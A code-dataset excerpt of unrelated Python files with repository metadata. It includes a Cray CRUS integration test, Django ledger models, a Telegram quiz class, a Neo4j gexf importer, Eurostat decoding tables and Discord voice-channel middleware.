template_name=base_test_template, use_api=use_api, template_objects=template_objects,
xname_to_nid=xname_to_nid, xname_template_map=xname_template_map)
# Verify slurm reports all test nodes as ready
do_subtest("Verify slurm reports test nodes as ready", verify_initial_slurm_state,
use_api=use_api, slurm_control_xname=slurm_xname, worker_xnames=test_xnames,
xname_to_nid=xname_to_nid)
crus_session_hsm_groups = {
"failed_label": test_hsm_groups["failed"],
"starting_label": test_hsm_groups["starting"],
"upgrading_label": test_hsm_groups["upgrading"] }
def _set_starting_group(target_xnames):
"""
Wrapper to call common.hsm.set_hsm_group_members to set our starting
group's member list to equal the specified xnames
"""
group_name = crus_session_hsm_groups["starting_label"]
node_text = ", ".join(sorted(target_xnames))
if len(target_xnames) > 5:
info("Setting HSM group %s member list to: %s" % (group_name, node_text))
subtest_text = "Setting HSM group %s member list to %d test nodes" % (group_name, len(target_xnames))
else:
subtest_text = "Setting HSM group %s member list to: %s" % (group_name, node_text)
do_subtest(subtest_text, set_hsm_group_members, use_api=use_api, group_name=group_name, xname_list=target_xnames)
def _create_crus_session(target_xnames, step_size, template_name):
"""
First, makes a list of all current BOS sessions.
Then creates a CRUS session with the specified values.
The target_xnames list is just used for test logging purposes, to
describe the CRUS session.
Returns the session_id of the CRUS session, a
dictionary of the CRUS session values, and the collected
BOS session list.
"""
bos_sessions = do_subtest("Getting list of BOS sessions before CRUS session is running",
list_bos_sessions, use_api=use_api)
info("BOS session list: %s" % ", ".join(bos_sessions))
node_text = ", ".join(sorted(target_xnames))
if len(target_xnames) > 5:
info("Creating CRUS session with target nodes: %s" % node_text)
node_text = "%d test nodes" % len(target_xnames)
subtest_text = "Create CRUS session (template: %s, step size: %d, nodes: %s)" % (template_name, step_size, node_text)
crus_session_values = {
"use_api": use_api,
"upgrade_step_size": step_size,
"upgrade_template_id": template_name }
crus_session_values.update(crus_session_hsm_groups)
response_object = do_subtest(subtest_text, create_crus_session, **crus_session_values)
crus_session_id = response_object["upgrade_id"]
return crus_session_id, crus_session_values, bos_sessions
def _wait_verify_delete_crus_session(crus_session_id, crus_session_values, target_xnames, bos_sessions):
"""
Wait for CRUS session to be complete.
Update the xname_template_map to reflect the new expected template for the nodes in the session.
Verify that the CRUS session results look okay.
Delete the CRUS session.
"""
do_subtest("Wait for CRUS session %s to complete" % crus_session_id, monitor_crus_session,
use_api=use_api, upgrade_id=crus_session_id, expected_values=crus_session_values,
bos_sessions=bos_sessions)
# Set new expected template for target xnames
for xn in target_xnames:
xname_template_map[xn] = crus_session_values["upgrade_template_id"]
do_subtest("Verify results of CRUS session %s" % crus_session_id, verify_results_of_crus_session,
use_api=use_api, xname_template_map=xname_template_map, template_objects=template_objects,
xname_to_nid=xname_to_nid, target_xnames=list(target_xnames), **crus_session_hsm_groups)
do_subtest("Delete CRUS session %s" % crus_session_id, delete_crus_session,
use_api=use_api, upgrade_id=crus_session_id, max_wait_for_completion_seconds=300)
# =============================
# =============================
# TEST 1
# =============================
# =============================
# Randomly pick 1 xname
xn = random.choice(test_xnames)
target_xnames = [xn]
# Put it into starting HSM group
_set_starting_group(target_xnames)
# Pick random step size (since we're only dealing with 1 node, it doesn't matter)
ssize = random.randint(1, 10000)
# Create CRUS session
crus_session_id, crus_session_values, bos_sessions = _create_crus_session(target_xnames, ssize, test_template1)
# Wait for it to finish, make sure everything looks good, and delete it
_wait_verify_delete_crus_session(crus_session_id, crus_session_values, target_xnames, bos_sessions)
# =============================
# =============================
# TEST 2
# =============================
# =============================
# Set starting group to all test nodes
target_xnames = test_xnames
_set_starting_group(target_xnames)
# Set step size such that we get at least 2 steps
ssize = len(target_xnames) // 2
if (len(target_xnames) % 2) != 0:
ssize += 1
ssize = min(ssize, max_step_size)
# Create CRUS session
crus_session_id, crus_session_values, bos_sessions = _create_crus_session(target_xnames, ssize, test_template2)
# Wait for it to finish, make sure everything looks good, and delete it
_wait_verify_delete_crus_session(crus_session_id, crus_session_values, target_xnames, bos_sessions)
# =============================
# =============================
# TEST 3
# =============================
# =============================
# Randomly select a node for the starting group
xn = random.choice(test_xnames)
target_xnames = [xn]
_set_starting_group(target_xnames)
# Pick random step size (since we're only dealing with 1 node, it doesn't matter)
ssize = random.randint(1, 10000)
# Start slurm workload on node
slurm_job_id, slurm_job_stopfile = do_subtest("Start slurm workload on %s" % xn, start_slurm_job,
slurm_control_xname=slurm_xname, worker_xname=xn, xname_to_nid=xname_to_nid, tmpdir=tmpdir)
# Create CRUS session
crus_session_id, crus_session_values, bos_sessions = _create_crus_session([xn], ssize, test_template1)
# Verify that CRUS session is waiting for nodes to quiesce
do_subtest("Verify CRUS session %s is waiting for nodes to quiesce" % crus_session_id,
verify_crus_waiting_for_quiesce, use_api=use_api, crus_session_id=crus_session_id,
expected_values=crus_session_values)
# Stop slurm workload on node
do_subtest("Stop slurm workload on %s" % xn, complete_slurm_job,
slurm_control_xname=slurm_xname, worker_xname=xn,
stopfile_name=slurm_job_stopfile, slurm_job_id=slurm_job_id)
# Wait for CRUS session to finish, make sure everything looks good, and delete it
_wait_verify_delete_crus_session(crus_session_id, crus_session_values, target_xnames, bos_sessions)
# =============================
# =============================
# RESTORE NODES
# =============================
# =============================
# Set starting group to all test nodes plus the node we've been using for slurm
target_xnames = xnames
_set_starting_group(target_xnames)
# Create CRUS session
crus_session_id, crus_session_values, bos_sessions = _create_crus_session(target_xnames, ssize, base_test_template)
# Wait for it to finish, make sure everything looks good, and delete it
_wait_verify_delete_crus_session(crus_session_id, crus_session_values, target_xnames, bos_sessions)
# =============================
# =============================
# CLEANUP
# =============================
# =============================
section("Cleaning up")
do_subtest("Delete modified BOS session templates", delete_bos_session_templates, use_api=use_api,
template_names=test_template_names)
do_subtest("Delete VCS repo and org", delete_vcs_repo_and_org, test_variables=test_variables)
do_subtest("Delete CFS configurations", delete_cfs_configs, use_api=use_api, cfs_config_names=test_variables["test_cfs_config_names"])
do_subtest("Delete hsm groups", delete_hsm_groups, use_api=use_api, group_map=test_hsm_groups)
do_subtest("Remove temporary directory", remove_tmpdir, tmpdir=tmpdir)
test_variables["tmpdir"] = None
section("Test passed")
def test_wrapper():
test_variables = {
"test_template_names": list(),
"test_cfs_config_names": list(),
"test_hsm_groups": dict(),
"tmpdir": None,
"test_vcs_org": None,
"test_vcs_repo": None,
"vcs_repo_dir": None }
parse_args(test_variables)
init_logger(test_name=TEST_NAME, verbose=test_variables["verbose"])
info("Starting test")
debug("Arguments: %s" % sys.argv[1:])
debug("test_variables: %s" % str(test_variables))
use_api = test_variables["use_api"]
try:
do_test(test_variables=test_variables)
except Exception as e:
# Adding this here to do cleanup when unexpected errors are hit (and to log those errors)
msg = log_exception_error(e)
section("Attempting cleanup before exiting in failure")
try:
test_template_names = test_variables["test_template_names"]
except KeyError:
test_template_names = None
try:
test_cfs_config_names = test_variables["test_cfs_config_names"]
except KeyError:
test_cfs_config_names = None
try:
test_hsm_groups = test_variables["test_hsm_groups"]
except KeyError:
test_hsm_groups = None
try:
tmpdir = test_variables["tmpdir"]
except KeyError:
tmpdir = None
if test_template_names:
info("Attempting to clean up test BOS session templates before exiting")
delete_bos_session_templates(use_api=use_api, template_names=test_template_names, error_cleanup=True)
if test_cfs_config_names:
delete_cfs_configs(use_api=use_api, cfs_config_names=test_cfs_config_names, error_cleanup=True)
delete_vcs_repo_and_org(test_variables=test_variables, error_cleanup=True)
if test_hsm_groups:
info("Attempting to clean up test HSM groups before exiting")
delete_hsm_groups(use_api=use_api, group_map=test_hsm_groups, error_cleanup=True)
if tmpdir != None:
remove_tmpdir(tmpdir)
section("Cleanup complete")
error_exit(msg)
if __name__ == '__main__':
test_wrapper()
exit_test() | 45.226966 | 138 | 0.673507 |
3a80351f1ae9d22c12f2dfa0609670916e8b44d0 | 3,071 | py | Python | backend/transaction/models.py | elielagmay/react-budgeteer | 49a25dbd6dd6ea5d8bc93421eefbc12808f585af | [
"Unlicense"
] | 2 | 2018-10-23T00:40:53.000Z | 2021-05-31T08:19:40.000Z | backend/transaction/models.py | elielagmay/react-budgeteer | 49a25dbd6dd6ea5d8bc93421eefbc12808f585af | [
"Unlicense"
] | null | null | null | backend/transaction/models.py | elielagmay/react-budgeteer | 49a25dbd6dd6ea5d8bc93421eefbc12808f585af | [
"Unlicense"
] | null | null | null | from decimal import Decimal
from django.core.exceptions import ValidationError
from django.db import models
from app.utils import get_balances
class Transaction(models.Model):
ledger = models.ForeignKey(
'ledger.Ledger',
on_delete=models.PROTECT,
related_name='transactions'
)
date = models.DateTimeField()
payee = models.CharField(max_length=255)
description = models.TextField(blank=True)
class Meta:
get_latest_by = 'date'
ordering = ('-date', )
def __str__(self):
return u'{} - {}{}'.format(
self.date.strftime('%d %b %Y'),
self.payee,
' - {}'.format(self.description) if self.description else ''
)
def is_balanced(self):
entries = self.entries.all()
balance = get_balances(entries, convert=True)
unbalanced = [v for v in balance if v['amount'] != 0]
return len(unbalanced) == 0
is_balanced.boolean = True
def is_cleared(self):
return not self.entries.filter(is_cleared=False).exists()
is_cleared.boolean = True
class Entry(models.Model):
transaction = models.ForeignKey(
'transaction.Transaction',
on_delete=models.CASCADE,
related_name='entries'
)
account = models.ForeignKey(
'account.Account',
on_delete=models.PROTECT,
related_name='entries'
)
commodity = models.ForeignKey(
'commodity.Commodity',
on_delete=models.PROTECT,
related_name='entries'
)
price = models.ForeignKey(
'commodity.Price',
on_delete=models.PROTECT,
related_name='entries',
null=True,
blank=True
)
amount = models.DecimalField(max_digits=32, decimal_places=8)
description = models.TextField(blank=True)
is_cleared = models.BooleanField(default=True)
class Meta:
verbose_name_plural = 'entries'
def __str__(self):
return u'Entry ID:{}'.format(self.id)
def clean(self):
errors = {}
ledger = self.transaction.ledger
if ledger != self.account.category.ledger:
errors['account'] = 'Selected account is invalid'
if ledger != self.commodity.ledger:
errors['commodity'] = 'Selected commodity is invalid'
if self.price is not None and ledger != self.price.primary.ledger:
errors['price'] = 'Selected price is invalid'
if self.price is not None and self.price.primary != self.commodity:
errors['price'] = 'Selected price must match commodity'
if errors:
raise ValidationError(errors)
def get_amount_tuple(self, convert=False):
amount = Decimal(str(self.amount))
commodity = self.commodity
if not amount.is_finite():
raise ValueError('amount is not a finite number')
if convert and self.price is not None:
commodity = self.price.secondary
amount *= self.price.amount
return (commodity.get_quantized_amount(amount), commodity)
| 29.528846 | 75 | 0.626506 |
3a804a776b085e92ef90bbf2391ea52e871ea437 | 2,335 | py | Python | src/games/textquiz.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | src/games/textquiz.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | src/games/textquiz.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | # python-telegram-quiz
# @author: Aleksandr Gordienko
# @site: https://github.com/aleksandrgordienko/melissa-quiz
from random import randint
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Question(Base):
__tablename__ = 'questions'
id = Column(Integer, primary_key=True)
question = Column(String(1000))
answer = Column(String(100))
ask_count = Column(Integer)
class TextQuiz:
"""TextQuiz class"""
def __init__(self, session):
self.questions = {}
self.name = 'textquiz'
self.session = session
for question in self.session.query(Question).all():
self.questions[question.id] = {'question': question.question,
'answer': question.answer,
'ask_count': question.ask_count}
def nextq(self):
"""Generates next question_id, question_type and initial_hint"""
question_id = randint(0, len(self.questions))
question = self.questions[question_id]
question['ask_count'] += 1
self.session.merge(Question(id=question_id,
ask_count=question['ask_count']))
self.session.commit()
return question_id, self.get_initial_hint_mask(question_id)
def get_question(self, question_id):
return self.questions[question_id]['question']
def get_answer(self, question_id):
return self.questions[question_id]['answer']
def answer_is_correct(self, question_id, answer):
return answer.lower() in self.get_answer(question_id).lower()
def get_hint_text(self, question_id, hint_symbol, hint_separator, hint_mask):
out_text = ''
answer = self.get_answer(question_id)
if hint_mask:
for i, c in enumerate(answer):
if hint_mask[i]:
out_text += c
else:
out_text += hint_symbol
out_text += hint_separator
else:
out_text = (hint_symbol + hint_separator) * len(answer)
return out_text
def get_initial_hint_mask(self, question_id):
"""Returns initial hint mask"""
return [False] * len(self.get_answer(question_id))
| 33.357143 | 81 | 0.621842 |
3a818c77d8d52a71bd103be2681594c2e4e919a8 | 1,246 | py | Python | Automate the Boring Stuff with Python/readDocx.py | m-barnes/Python | 0940d5f9b832c28703a32691db287b1361ce6ecc | [
"MIT"
] | null | null | null | Automate the Boring Stuff with Python/readDocx.py | m-barnes/Python | 0940d5f9b832c28703a32691db287b1361ce6ecc | [
"MIT"
] | null | null | null | Automate the Boring Stuff with Python/readDocx.py | m-barnes/Python | 0940d5f9b832c28703a32691db287b1361ce6ecc | [
"MIT"
] | null | null | null | import docx
import time
import os
from os import system
from pprint import pprint
finished = False
def getText(filename):
print(filename)
doc = docx.Document(filename)
fullText = []
for para in doc.paragraphs:
fullText.append(para.text)
pprint(fullText)
def clear():
try:
system('cls')
except:
system('clear')
while finished == False:
def parseFile():
print('The current working directory is ', os.getcwd())
path = input('\nPlease provide the full path to the Word document you wish to parse or press \'enter\' to keep the current directory.\n')
if len(path)==0:
path = os.getcwd()
try:
os.path.abspath(path)
os.chdir(path)
except:
print('Cannot find that directory. Please wait...')
time.sleep(2)
clear()
parseFile()
try:
filename = input('\nPlease provide the name of the Word document. ')
getText(filename + '.docx')
continueParse = input('\n\n\nWould you like to parse another file? (y)es or (n)o? ').lower()
if continueParse == 'y':
parseFile()
else:
print('Goodbye!')
time.sleep(2)
sys.exit()
except:
print('Cannot find that file. Please try again. Please wait...')
time.sleep(2)
clear()
parseFile()
parseFile()
| 20.766667 | 139 | 0.652488 |
3a83a000f0a9ae9cf8e818fa8a8f6b2e52f61077 | 2,014 | py | Python | Leetcode/Python/_1207.py | Xrenya/algorithms | aded82cacde2f4f2114241907861251e0e2e5638 | [
"MIT"
] | 1 | 2021-11-28T15:03:32.000Z | 2021-11-28T15:03:32.000Z | Leetcode/Python/_1207.py | Xrenya/algorithms | aded82cacde2f4f2114241907861251e0e2e5638 | [
"MIT"
] | null | null | null | Leetcode/Python/_1207.py | Xrenya/algorithms | aded82cacde2f4f2114241907861251e0e2e5638 | [
"MIT"
] | null | null | null | class Solution:
def uniqueOccurrences(self, arr: List[int]) -> bool:
hashMap = {}
for num in arr:
if num not in hashMap:
hashMap[num] = 1
else:
hashMap[num] += 1
array = hashMap.values()
unique = {}
for num in array:
if num not in unique:
unique[num] = 1
else:
return False
return True
class Solution:
def uniqueOccurrences(self, arr: List[int]) -> bool:
hashMap = {}
for num in arr:
if num not in hashMap:
hashMap[num] = 1
else:
hashMap[num] += 1
unique = {}
for num in hashMap.values():
if num not in unique:
unique[num] = 1
else:
return False
return True
class Solution:
def uniqueOccurrences(self, arr: List[int]) -> bool:
hashMap = {}
for num in arr:
if num not in hashMap:
hashMap[num] = 1
else:
hashMap[num] += 1
return len(hashMap) == len(set(hashMap.values()))
class Solution:
def uniqueOccurrences(self, arr: List[int]) -> bool:
hashMap = {}
for num in arr:
if num not in hashMap:
hashMap[num] = 1
else:
hashMap[num] += 1
array = []
for val in hashMap.values():
array.append(val)
return len(array) == len(set(array))
class Solution:
def uniqueOccurrences(self, arr: List[int]) -> bool:
hashMap = {}
for num in arr:
if num not in hashMap:
hashMap[num] = 1
else:
hashMap[num] += 1
array = []
for val in hashMap.values():
array.append(val)
while array:
num = array.pop()
if num in array:
return False
return True
| 27.589041 | 57 | 0.456802 |
3a84202d32e5e1c571adc31fc572e8596c4a5a08 | 87 | py | Python | rura/pipeline/__init__.py | fdabek1/rura | 6779733149d7e4181be54ecb72fbd4de6d71c678 | [
"MIT"
] | null | null | null | rura/pipeline/__init__.py | fdabek1/rura | 6779733149d7e4181be54ecb72fbd4de6d71c678 | [
"MIT"
] | null | null | null | rura/pipeline/__init__.py | fdabek1/rura | 6779733149d7e4181be54ecb72fbd4de6d71c678 | [
"MIT"
] | null | null | null | from .dataset import Dataset
from .model import Model
from .transform import Transform
| 21.75 | 32 | 0.827586 |
3a8504e3359b503e6fccca39bd8d8317686a767b | 5,707 | py | Python | originalCode_JMG/data/dataimportallIN.py | dataforgoodfr/batch9_validalab | f333bea8203fd1e4ed098b6e2d51a7f7b05ae530 | [
"MIT"
] | null | null | null | originalCode_JMG/data/dataimportallIN.py | dataforgoodfr/batch9_validalab | f333bea8203fd1e4ed098b6e2d51a7f7b05ae530 | [
"MIT"
] | null | null | null | originalCode_JMG/data/dataimportallIN.py | dataforgoodfr/batch9_validalab | f333bea8203fd1e4ed098b6e2d51a7f7b05ae530 | [
"MIT"
] | 1 | 2021-04-19T21:27:58.000Z | 2021-04-19T21:27:58.000Z | import networkx as nx
from py2neo import Graph, Node, Relationship
import pandas as pd
import random
graph = Graph("bolt://localhost:7687", auth=("neo4j", "Password"))
def importGexf(gexffilepath, depth = 0):
'''
Reads gexf network file from hyphe, update or create all nodes and relationships in neo4j database
Print . for each 100 nodes/links imported, 1000 for each 1000
"depth" is used to prefix new properties on node and rel. Value can be 0, 1 or 2
'''
# imports or update all nodes / relationships in gexf file from hyphe
G= nx.read_gexf(gexffilepath, node_type=None, relabel=False, version='1.1draft')
data = nx.json_graph.node_link_data(G)
totnbnodes=len(data['nodes'])
print(totnbnodes," nodes found in gexf")
i=1
for node in data['nodes']:
i=i+1
nodematch = graph.nodes.match(site_name =node['label']).first()
if nodematch == None:
try:
nodematch = Node('Website', site_name = node['label'])
nodematch.__primarylabel__ = 'Website'
nodematch.__primarykey__ = 'site_name'
graph.merge(nodematch)
except:
print("could not import ", node['label'])
for key in node.keys():
nodematch["D" + str(depth) + "_" + key] = node[key]
graph.push(nodematch)
if i%100 == 0:
print(".", end=" ")
if i%1000 ==0:
print(i,"/",totnbnodes)
print(i," nodes imported")
print(len(graph.nodes.match("Website")), "nodes in db after import")
totnblinks=len(data['links'])
print(totnblinks," links found in gexf")
j=0
for link in data['links']:
if depth ==0:
source_n = graph.nodes.match("Website", D0_id = link['source']).first()
target_n = graph.nodes.match("Website", D0_id = link['target']).first()
if depth == 1:
source_n = graph.nodes.match("Website", D1_id = link['source']).first()
target_n = graph.nodes.match("Website", D1_id = link['target']).first()
if depth == 2:
source_n = graph.nodes.match("Website", D2_id = link['source']).first()
target_n = graph.nodes.match("Website", D2_id = link['target']).first()
if depth == 3:
source_n = graph.nodes.match("Website", D3_id = link['source']).first()
target_n = graph.nodes.match("Website", D3_id = link['target']).first()
relmatch = graph.relationships.match((source_n,target_n),r_type="LINKS_TO").first()
try:
if relmatch == None:
rel = Relationship(source_n, "LINKS_TO", target_n)
rel["count_D" + str(depth)]=link['count']
graph.merge(rel)
else:
relmatch["count_D" + str(depth)]=link['count']
graph.push(relmatch)
if j%100 == 0:
print(".", end=" ")
if j%1000 ==0:
print(j, "/", totnblinks)
j=j+1
except:
pass
print(j," links imported")
print(len(graph.relationships.match()), "links in db after import")
def importGexfLinks(gexffilepath, depth = 0):
'''
Reads gexf network file from hyphe, update or create relationships in neo4j database
Print . for each 100 links imported, 1000 for each 1000
"depth" is used to prefix new properties on rel. Value can be 0, 1 or 2
'''
G= nx.read_gexf(gexffilepath, node_type=None, relabel=False, version='1.1draft')
data = nx.json_graph.node_link_data(G)
totnblinks=len(data['links'])
print(totnblinks," links found in gexf")
j=1
for link in data['links']:
if depth ==0:
source_n = graph.nodes.match("Website", D0_id = link['source']).first()
target_n = graph.nodes.match("Website", D0_id = link['target']).first()
if depth == 1:
source_n = graph.nodes.match("Website", D1_id = link['source']).first()
target_n = graph.nodes.match("Website", D1_id = link['target']).first()
if depth == 2:
source_n = graph.nodes.match("Website", D2_id = link['source']).first()
target_n = graph.nodes.match("Website", D2_id = link['target']).first()
if depth == 3:
source_n = graph.nodes.match("Website", D3_id = link['source']).first()
target_n = graph.nodes.match("Website", D3_id = link['target']).first()
relmatch = graph.relationships.match((source_n,target_n),r_type="LINKS_TO").first()
try:
if relmatch == None:
rel = Relationship(source_n, "LINKS_TO", target_n)
rel["count_D" + str(depth)]=link['count']
graph.merge(rel)
else:
relmatch["count_D" + str(depth)]=link['count']
graph.push(relmatch)
if j%100 == 0:
print(".", end=" ")
if j%1000 ==0:
print(j ,"/",totnblinks)
j=j+1
except:
pass
print(j," links imported")
print(len(graph.relationships.match()), "links in db after import")
# This imports all gexf files (takes time)
pathD0IN = "C:\\Users\\Jo\\Documents\\Tech\\Atom_prj\\MyMedia-FillDB\\data\\HypheExport20200520\\202005Websites01_D0_IN.gexf"
importGexf(pathD0IN, 0)
pathD1IN = "C:\\Users\\Jo\\Documents\\Tech\\Atom_prj\\MyMedia-FillDB\\data\\HypheExport20200520\\202005Websites01_D1_IN.gexf"
importGexf(pathD1IN, 1)
# This has not been done entirely
pathD2IN = "C:\\Users\\Jo\\Documents\\Tech\\Atom_prj\\MyMedia-FillDB\\data\\HypheExport20200520\\202005_Websites01_D2_IN.gexf"
importGexf(pathD2IN, 2)
| 38.823129 | 126 | 0.58805 |
3a851eb1905fe0976754043eca815207cc550202 | 4,023 | py | Python | code_base/excess_mortality/decode_args.py | Mlad-en/COV-BG | dabc6875e49b1fdb113ed691fbf70d5bdcb1846c | [
"MIT"
] | null | null | null | code_base/excess_mortality/decode_args.py | Mlad-en/COV-BG | dabc6875e49b1fdb113ed691fbf70d5bdcb1846c | [
"MIT"
] | null | null | null | code_base/excess_mortality/decode_args.py | Mlad-en/COV-BG | dabc6875e49b1fdb113ed691fbf70d5bdcb1846c | [
"MIT"
] | null | null | null | from code_base.excess_mortality.decode_loc_vars import *
DECODE_DEMO_COL = {
'excess_mortality_by_sex_age_country': 'age,sex,unit,geo\\time',
'excess_mortality_by_sex_age_nuts3': 'unit,sex,age,geo\\time',
'europe_population_by_age_and_sex': 'freq;unit;sex;age;geo\TIME_PERIOD'
}
DECODE_DEMO_REPL = {
'excess_mortality_by_sex_age_country': ['Age', 'Sex', 'Unit', 'Location'],
'excess_mortality_by_sex_age_nuts3': ['Unit', 'Sex', 'Age', 'Location'],
'europe_population_by_age_and_sex': ['Frequency', 'Unit', 'Sex', 'Age', 'Location']
}
DECODE_DEMO_SEPARATOR = {
'excess_mortality_by_sex_age_country': ',',
'excess_mortality_by_sex_age_nuts3': ',',
'europe_population_by_age_and_sex': ';'
}
RETAIN_COLUMNS = {
'excess_mortality_by_sex_age_country': ['Age', 'Sex', 'Location'],
'excess_mortality_by_sex_age_nuts3': ['Age', 'Sex', 'Location'],
'europe_population_by_age_and_sex': ['Age', 'Sex', 'Location', '2020']
}
COUNTRY_REPLACE = {
'excess_mortality_by_sex_age_country': EU_COUNTRIES_ISO_2_DECODES,
'excess_mortality_by_sex_age_nuts3': EU_DECODE_NUTS3_REGIONS,
'europe_population_by_age_and_sex': EU_COUNTRIES_ISO_2_DECODES
}
FILE_EXT_TYPE = {
'csv': '.csv',
'excel': '.xlsx',
}
EUROSTAT_AGES_CONVERSION = {
'TOTAL': 'Total',
'Y_LT5': '(0-4)',
'Y5-9': '(5-9)',
'Y10-14': '(10-14)',
'Y15-19': '(15-19)',
'Y20-24': '(20-24)',
'Y25-29': '(25-29)',
'Y30-34': '(30-34)',
'Y35-39': '(35-39)',
'Y40-44': '(40-44)',
'Y45-49': '(45-49)',
'Y50-54': '(50-54)',
'Y55-59': '(55-59)',
'Y60-64': '(60-64)',
'Y65-69': '(65-69)',
'Y70-74': '(70-74)',
'Y75-79': '(75-79)',
'Y80-84': '(80-84)',
'Y85-89': '(85-89)',
'Y_GE90': '(90+)',
}
EUROSTAT_SEX_CONVERSION = {
'F': 'Female',
'M': 'Male',
'T': 'Total',
}
UN_DECODE_AGE_GROUPS = {
'Total': 'Total',
'0 - 4': '(0-4)',
'5 - 9': '(5-9)',
'10 - 14': '(10-14)',
'15 - 19': '(15-19)',
'20 - 24': '(20-24)',
'25 - 29': '(25-29)',
'30 - 34': '(30-34)',
'35 - 39': '(35-39)',
'40 - 44': '(40-44)',
'45 - 49': '(45-49)',
'50 - 54': '(50-54)',
'55 - 59': '(55-59)',
'60 - 64': '(60-64)',
'65 - 69': '(65-69)',
'70 - 74': '(70-74)',
'75 - 79': '(75-79)',
'80 - 84': '(80-84)',
'85 - 89': '(85-89)',
'90 - 94': '(90+)',
'95 - 99': '(90+)',
'100 +': '(90+)',
'90 +': '(90+)',
}
UN_DECODE_SEX_GROUPS = {
'Both Sexes': 'Total',
'Male': 'Male',
'Female': 'Female',
}
std_eu_pop_2013_decode_age = {
# Combine 0-4 by decoding uder 1 and 1-4 as the same value
'Under 1 year': '(0-4)',
'1 year to under 5 years': '(0-4)',
'5 to under 10 years': '(5-9)',
'10 to under 15 years': '(10-14)',
'15 to under 20 years': '(15-19)',
'20 to under 25 years': '(20-24)',
'25 to under 30 years': '(25-29)',
'30 to under 35 years': '(30-34)',
'35 to under 40 years': '(35-39)',
'40 to under 45 years': '(40-44)',
'45 to under 50 years': '(45-49)',
'50 to under 55 years': '(50-54)',
'55 to under 60 years': '(55-59)',
'60 to under 65 years': '(60-64)',
'65 to under 70 years': '(65-69)',
'70 to under 75 years': '(70-74)',
'75 to under 80 years': '(75-79)',
'80 to under 85 years': '(80-84)',
'85 to under 90 years': '(85-89)',
'90 years and older': '(90+)',
}
INFOSTAT_DECODE_AGE_GROUPS = {
'Total': 'Total',
'0': '(0-4)',
'1 - 4': '(0-4)',
'5 - 9': '(5-9)',
'10 - 14': '(10-14)',
'15 - 19': '(15-19)',
'20 - 24': '(20-24)',
'25 - 29': '(25-29)',
'30 - 34': '(30-34)',
'35 - 39': '(35-39)',
'40 - 44': '(40-44)',
'45 - 49': '(45-49)',
'50 - 54': '(50-54)',
'55 - 59': '(55-59)',
'60 - 64': '(60-64)',
'65 - 69': '(65-69)',
'70 - 74': '(70-74)',
'75 - 79': '(75-79)',
'80 - 84': '(80-84)',
'85 - 89': '(85-89)',
'90 - 94': '(90+)',
'95 - 99': '(90+)',
'100+': '(90+)',
}
| 27 | 87 | 0.505096 |
3a862072dc82d94cea5c675c09cf65fbf2cd377c | 4,510 | py | Python | concord/ext/audio/middleware.py | nariman/concord-ext-audio | c7662507f641bfdba277509838433dbb24fe11a3 | [
"MIT"
] | null | null | null | concord/ext/audio/middleware.py | nariman/concord-ext-audio | c7662507f641bfdba277509838433dbb24fe11a3 | [
"MIT"
] | 14 | 2019-02-19T03:14:07.000Z | 2021-06-25T15:15:55.000Z | concord/ext/audio/middleware.py | narimanized/concord-ext-audio | c7662507f641bfdba277509838433dbb24fe11a3 | [
"MIT"
] | null | null | null | """
The MIT License (MIT)
Copyright (c) 2017-2018 Nariman Safiulin
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import asyncio
from typing import Callable, Optional
import discord
from concord.context import Context
from concord.middleware import Middleware, MiddlewareState
from concord.ext.audio.state import State
class Join(Middleware):
"""Middleware for joining to the user's voice channel."""
async def run(self, *_, ctx: Context, next: Callable, **kw): # noqa: D102
state = MiddlewareState.get_state(ctx, State)
if state is None:
return
message = ctx.kwargs["message"]
author = message.author
channel = message.channel
if not isinstance(author, discord.Member):
await channel.send("You're not a member of this guild.")
return
if not author.voice:
await channel.send("You're not in a voice channel.")
return
#
# Only guilds are allowed.
voice_client = channel.guild.voice_client
audio_state = state.get_audio_state(channel.guild)
voice_channel = author.voice.channel
if voice_client is None:
try:
voice_client = await voice_channel.connect()
except asyncio.TimeoutError:
await channel.send(
"Unfortunately, something wrong happened and I hasn't "
"joined your channel in a time."
)
return
await channel.send("Connected.")
elif voice_client.channel != voice_channel:
await voice_client.move_to(voice_channel)
await channel.send("Moved.")
else:
await channel.send("I'm already in your voice channel.")
#
audio_state.set_voice_client(voice_client)
class Leave(Middleware):
"""Middleware for leaving currently connected voice channel."""
async def run(self, *_, ctx: Context, next: Callable, **kw): # noqa: D102
message = ctx.kwargs["message"]
author = message.author
channel = message.channel
if not isinstance(author, discord.Member):
await channel.send("You're not a member of this guild.")
return
#
# Only guilds are allowed.
voice_client = channel.guild.voice_client
if voice_client is None:
await message.channel.send("I'm not connected to voice channel.")
return
#
# Voice client will be removed from audio state as well.
await voice_client.disconnect(force=True)
await message.channel.send("Disconnected.")
class Volume(Middleware):
"""Middleware for changing the master volume."""
async def run(
self,
*_,
ctx: Context,
next: Callable,
volume: Optional[str] = None,
**kw,
): # noqa: D102
state = MiddlewareState.get_state(ctx, State)
if state is None:
return
message = ctx.kwargs["message"]
channel = message.channel
# Only guilds are allowed.
audio_state = state.get_audio_state(channel.guild)
if volume is not None:
try:
audio_state.master_volume = float(volume)
except ValueError:
await channel.send("Only float values are possible.")
return
#
await channel.send(
f"Master volume is set to {audio_state.master_volume}"
)
| 34.166667 | 80 | 0.645455 |
